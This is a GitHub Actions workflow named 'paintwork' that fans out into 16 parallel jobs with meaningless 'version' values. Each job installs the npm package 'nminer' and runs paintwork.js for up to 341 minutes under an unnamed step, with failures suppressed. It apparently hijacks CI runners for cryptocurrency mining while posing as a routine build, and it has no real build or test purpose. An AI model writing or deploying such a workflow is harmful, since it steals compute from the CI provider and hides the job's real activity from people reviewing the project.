name: paintwork
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7079 }
          - { version: 3661 }
          - { version: 8888 }
          - { version: 9477 }
          - { version: 4115 }
          - { version: 2038 }
          - { version: 3116 }
          - { version: 8956 }
          - { version: 7288 }
          - { version: 3248 }
          - { version: 5360 }
          - { version: 9971 }
          - { version: 399 }
          - { version: 9980 }
          - { version: 4099 }
          - { version: 9606 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 341m node paintwork.js || echo "paintwork executed"